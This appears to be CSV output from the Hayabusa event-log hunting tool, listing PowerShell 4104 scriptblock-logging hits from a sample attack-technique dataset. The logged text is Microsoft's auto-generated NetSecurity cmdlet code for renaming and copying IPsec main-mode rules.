($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName ))",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"{ $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecMainModeRule' -Alias '*' function Copy-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"{ $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecMainModeRule' -Alias '*' function Copy-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { 